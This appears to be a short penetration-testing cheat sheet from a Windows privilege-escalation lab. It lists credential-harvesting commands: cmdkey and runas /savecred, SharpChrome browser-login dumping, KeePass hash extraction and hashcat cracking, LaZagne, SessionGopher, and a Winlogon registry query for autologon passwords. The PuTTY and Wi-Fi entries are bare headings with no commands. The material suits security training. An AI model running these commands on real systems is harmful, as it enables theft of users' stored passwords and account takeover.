21.Further-credential-theft
Cmdkey Saved Credentials
cmdkey /list
runas /savecred /user:inlanefreight\bob "COMMAND HERE"Browser Credentials (Chrome)
.\SharpChrome.exe logins /unprotectPassword Managers (KeePass)
python2.7 keepass2john.py ILFREIGHT_Help_Desk.kdbx
hashcat -m 13400 keepass_hash /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txtLaZagne
.\lazagne.exe -h
.\lazagne.exe allSessionGopher
Import-Module .\SessionGopher.ps1
Invoke-SessionGopher -Target WINLPE-SRV01Clear-Text Passwords in Registry (Autologon)
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"Clear-Text Passwords in Registry (PuTTY)
Wifi Passwords
Last updated